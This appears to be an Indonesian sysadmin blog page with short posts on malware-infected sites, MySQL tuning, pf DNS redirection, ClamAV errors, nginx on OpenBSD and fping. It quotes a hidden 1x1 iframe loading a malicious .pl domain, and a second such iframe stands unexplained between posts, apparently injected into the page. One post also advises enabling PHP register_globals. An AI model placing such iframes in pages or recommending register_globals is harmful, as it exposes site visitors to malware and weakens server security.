Idur on Jl. Arifin 129 Kepatihan

Dari post sebelumnya tentang malware, ada beberapa domain yang terdeteksi dan diduga terinfeksi malware, setelah saya runut2 keseluruhan script yang ada di domain tersebut ternyata telah ter ijex oleh malware. sebelum penutup body pasti ada script sebagai berikut 

<iframe src=”http://www.Trenz.pl/rc/” width=1 height=1 frameborder=0></iframe>

kalo saya sebagai admin server suruh membersihkan semua script malware tersebut capek deh…. 

script malware diatas muncul kemungkinan besar komputer yang dibuat untuk membangun web tesebut telah terkena virus

Mungkin anda pernah menemui error seperti diatas, ketika membuka sebuah halam web. Itu dikarenakan web yang anda buka terinfeksi oleh malware, atau kemungkinan besar script web yang digunakan ada yang dianggap malware oleh google / stopbadware.org. untuk mengatasi permasalahan diatas ketika anda sebagai admin web adalah sebagai berikut :

1. coba anda liat dulu script yang anda gunakan apakah ada script yang mencurugakan hehhe, kalo mungkin themes yang anda gunakan adalah themes freee wkekeke.
2. Melakukan pembersihan script malware/badware pada script website anda
3. Meminta review pada pihak stopbadware.org
4. Meminta review pihak Google
Khusus untuk poin yang ke 3. yaitu Meminta review pihak Google, caranya adalah

Anda harus memiliki account di google, bisa berupa account email di gmail.com.
Masuk ke http://google.com/webmasters/tools
Daftarkan website anda di google webmaster tools lalu lakukan verifikasi/verify. Anda harus membuat file html dari notepad, isinya cukup kosong saja, dan di save as semisal : googlefc91be7d5e697d70.html verifikasi tersebut masing-masing akan anda dapatkan setelah anda mendaftarkan website anda. File .html tersebut kemudian anda upload ke dalam directory website anda ( mis : public_html ) :

Cukup sekian laporan dari TKP ….. kekeke

<iframe src=”http://jL.chura.pl/rc/” style=”width:1px;height:1px”></iframe>

dari post yang terdahulu tentang mysql server yang sering jepat… setelah dilakukan TuneUP my.cnf sekarang mysql server berjalan dengan normal dan sehat

untuk para administrator web server yang mungkin webservernya sangat sibuk perlu dilakukan tuneUP di my.cnf dari si mysql. permasalahan ini saya alami ketika dah mulai banyak web - web yang bersarang di server kantor sangat sering sekali mysql down. untuk settingan my.cnf dari server saya sebagai berikut:

# Example MySQL config file for large systems.
#
# This is for a large system with memory = 512M where the system runs mainly
# MySQL.
#
# You can copy this file to
# /etc/my.cnf to set global options,
# mysql-data-dir/my.cnf to set server-specific options (in this
# installation this directory is /var/lib/mysql) or
# ~/.my.cnf to set user-specific options.
#
# In this file, you can use all long options that a program supports.
# If you want to know which options a program supports, run the program
# with the "--help" option.

# The following options will be passed to all MySQL clients
[client]
#password       = your_password
port            = 3306
socket          = /var/run/mysqld/mysqld.sock

# Here follows entries for some specific programs

# The MySQL server
[mysqld]
port            = 3306
socket          = /var/run/mysqld/mysqld.sock
skip-locking
key_buffer = 256M
max_allowed_packet = 1M
table_cache = 256
sort_buffer_size = 1M
read_buffer_size = 1M
read_rnd_buffer_size = 4M
myisam_sort_buffer_size = 64M
thread_cache_size = 8
query_cache_size= 16M
# Try number of CPU's*2 for thread_concurrency
thread_concurrency = 8

# Don't listen on a TCP/IP port at all. This can be a security enhancement,
# if all processes that need to connect to mysqld run on the same host.
# All interaction with mysqld must be made via Unix sockets or named pipes.
# Note that using this option without enabling named pipes on Windows
# (via the "enable-named-pipe" option) will render mysqld useless!
#
#skip-networking

# Replication Master Server (default)
# binary logging is required for replication
log-bin=mysql-bin

# required unique id between 1 and 2^32 - 1
# defaults to 1 if master-host is not set
# but will not function as a master if omitted
server-id       = 1

# Replication Slave (comment out master section to use this)
#
# To configure this host as a replication slave, you can choose between
# two methods :
#
# 1) Use the CHANGE MASTER TO command (fully described in our manual) -
#    the syntax is:
#
#    CHANGE MASTER TO MASTER_HOST=<host>, MASTER_PORT=<port>,
#    MASTER_USER=<user>, MASTER_PASSWORD=<password> ;
#
#    where you replace <host>, <user>, <password> by quoted strings and
#    <port> by the master's port number (3306 by default).
#
#    Example:
#
#    CHANGE MASTER TO MASTER_HOST='125.564.12.1', MASTER_PORT=3306,
#    MASTER_USER='joe', MASTER_PASSWORD='secret';
#
# OR
#
# 2) Set the variables below. However, in case you choose this method, then
#    start replication for the first time (even unsuccessfully, for example
#    if you mistyped the password in master-password and the slave fails to
#    connect), the slave will create a master.info file, and any later
#    change in this file to the variables' values below will be ignored and
#    overridden by the content of the master.info file, unless you shutdown
#    the slave server, delete master.info and restart the slaver server.
#    For that reason, you may want to leave the lines below untouched
#    (commented) and instead use CHANGE MASTER TO (see above)
#
# required unique id between 2 and 2^32 - 1
# (and different from the master)
# defaults to 2 if master-host is set
# but will not function as a slave if omitted
#server-id       = 2
#
# The replication master for this slave - required
#master-host     =   <hostname>
#
# The username the slave will use for authentication when connecting
# to the master - required
#master-user     =   <username>
#
# The password the slave will authenticate with when connecting to
# the master - required
#master-password =   <password>
#
# The port the master is listening on.
# optional - defaults to 3306
#master-port     =  <port>
#
# binary logging - not required for slaves, but recommended
#log-bin=mysql-bin

# Point the following paths to different dedicated disks
#tmpdir         = /tmp/
#log-update     = /path-to-dedicated-directory/hostname

# Uncomment the following if you are using BDB tables
#bdb_cache_size = 64M
#bdb_max_lock = 100000

# Uncomment the following if you are using InnoDB tables
#innodb_data_home_dir = /var/lib/mysql/
#innodb_data_file_path = ibdata1:10M:autoextend
#innodb_log_group_home_dir = /var/lib/mysql/
#innodb_log_arch_dir = /var/lib/mysql/
# You can set .._buffer_pool_size up to 50 - 80 %
# of RAM but beware of setting memory usage too high
#innodb_buffer_pool_size = 256M
#innodb_additional_mem_pool_size = 20M
# Set .._log_file_size to 25 % of buffer pool size
#innodb_log_file_size = 64M
#innodb_log_buffer_size = 8M
#innodb_flush_log_at_trx_commit = 1
#innodb_lock_wait_timeout = 50

[mysqldump]
quick
max_allowed_packet = 16M

[mysql]
no-auto-rehash
# Remove the next comment character if you are not familiar with SQL
#safe-updates

[isamchk]
key_buffer = 128M
sort_buffer_size = 128M
read_buffer = 2M
write_buffer = 2M

[myisamchk]
key_buffer = 128M
sort_buffer_size = 128M
read_buffer = 2M
write_buffer = 2M

[mysqlhotcopy]
interactive-timeout

untuk settingan diatas saya terapkan dalam mesin openBSD 4.5, ya untuk kestabilan dicek dulu berapa hari hehehe

Dari berita - berita yang heboh di TV yaitu tentang internet sehat, ada salah satu cara untuk membersihkan internet kita dengan membelokkan seluruh permintaan 53 ke Nawala.

rdr on $int_if proto {tcp, udp} to any port 53 -> 180.131.145.145 port 53

heheh …. coba buka… situs yang berbau xxx kekkee

mungkin ada yang pernah instal antivirus di server “calamAV” ketika selesai instal ada error seperti ini

LibClamAV Warning: ***********************************************************
LibClamAV Warning: ***  This version of the ClamAV engine is outdated.     ***
LibClamAV Warning: *** DON’T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************
LibClamAV Error: cli_hex2str(): Malformed hexstring: This ClamAV version has reached End of Life! Please upgrade to version 0.95 or later. For more information see  www.clamav.net/eol-clamav-094 and www.clamav.net/download (length: 169)
LibClamAV Error: Problem parsing database at line 738
LibClamAV Error: Can’t load daily.ndb: Malformed database
LibClamAV Error: cli_tgzload: Can’t load daily.ndb
LibClamAV Error: Can’t load /var/db/clamav/daily.cld: Malformed database
ERROR: Malformed database

itu dikarenakan data bases update dari antivirus rusak, agar error tersebut tidak muncul anda dell aja daily.cld pada calamAV nya. untuk hasilnya sebagai berikut ;

LibClamAV Warning: ***********************************************************
LibClamAV Warning: ***  This version of the ClamAV engine is outdated.     ***
LibClamAV Warning: *** DON’T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************

Suatu ketika ada salah satu web yang tidak jalan ketika di upload ke webserver, ternyata ketika dicex dan register_globals saya On dia bisa berjalan normal….. wekekke, ya gakk mungkinn lah di server saya register globalnya saya on ada cara agar register global bisa on dalam satu folder :

buat files dengan nama .htacces

kemudian isi filesnya adalah php_flag register_globals on

ini dulu laporan dari TKP wekekke …………… selebihnya tanya mbah Google

Dari artikel terdahulu yaitu tentang kehebatan nginx, dari situ saya pengen coba juga instal di mesin OpenBSD. ketika kantor dah sepi waktunya menjalankan misi hehehhehe…. karena mau pulang masih terlalu siang untuk tahapannya sebagai beriku :

1. siapkan mesin openbsd tentunya hehehe…..
2. download nginx dari websitenya yang pasti.
3. setelah itu masukkan ke dalam mesin openbsd nginx yang telah di download

- tar -zxvf file_nginx.tar.gz
- cd file_nginx
- ./configure

3. setelah perinta2 diatas dijalankan maka akan suatu pemberitahuan bahwa file dan folder yang akan tercipta ketika instalasi :

Configuration summary
+ using system PCRE library
+ OpenSSL library is not used
+ md5: using system crypto library
+ sha1 library is not used
+ using system zlib library

nginx path prefix: “/usr/local/nginx”
nginx binary file: “/usr/local/nginx/sbin/nginx”
nginx configuration prefix: “/usr/local/nginx/conf”
nginx configuration file: “/usr/local/nginx/conf/nginx.conf”
nginx pid file: “/usr/local/nginx/logs/nginx.pid”
nginx error log file: “/usr/local/nginx/logs/error.log”
nginx http access log file: “/usr/local/nginx/logs/access.log”
nginx http client request body temporary files: “client_body_temp”
nginx http proxy temporary files: “proxy_temp”
nginx http fastcgi temporary files: “fastcgi_temp”

4. setelah yakain jalankan perintah make dan make install tinggal nunggu beberapa saat aja hehehe 5. setelah selesai anda bisa akses lynx 127.0.0.1
6. dengan file konfigurasi seperti diatas.

Cukup sekiatan dan sampai disini dulu hehehe

istilah trigger saya pelajari ketika saya mempunyai dua database dan saya ingin ketika ada yang update pada database 1 maka database yang alain juga update. setelah brosing dan baca manual dari Mysql didapatlah namanya trigger ………… heheehhe

Trigger merupakan store procedure yang dijalankan secara automatis saat user melakukan modifikasi data pada tabel. Modifikasi data yang dilakukan pada tabel yaitu berupa perintah INSERT, UPDATE, dan DELETE.

INSERT , UPDATE dan DELETE bisa digabung jadi satu trigger yang dinamakan Multiple Trigger.

untuk lebih jelas baca manual dari Mysql :-))

Ketika mau mindahh mainan ke server monitoring, yaitu smokping ke server openbsd 4.5 ketika saya jalankan kok ada errrornta “Fping must be installed setuid root or it will not work” ya karena gakk tau googling aja dan ketemuu dehh jawabannya. Ternyata file FPing yang nantinya di jalankan oleh smokeping gak bisa diakses oleh smokeping, atau smokeping gak punya hak atas file tersebut solusinya:

chmod +s `which fping`?

Gitu aja kemudianjalankan smokeping jalan dehh….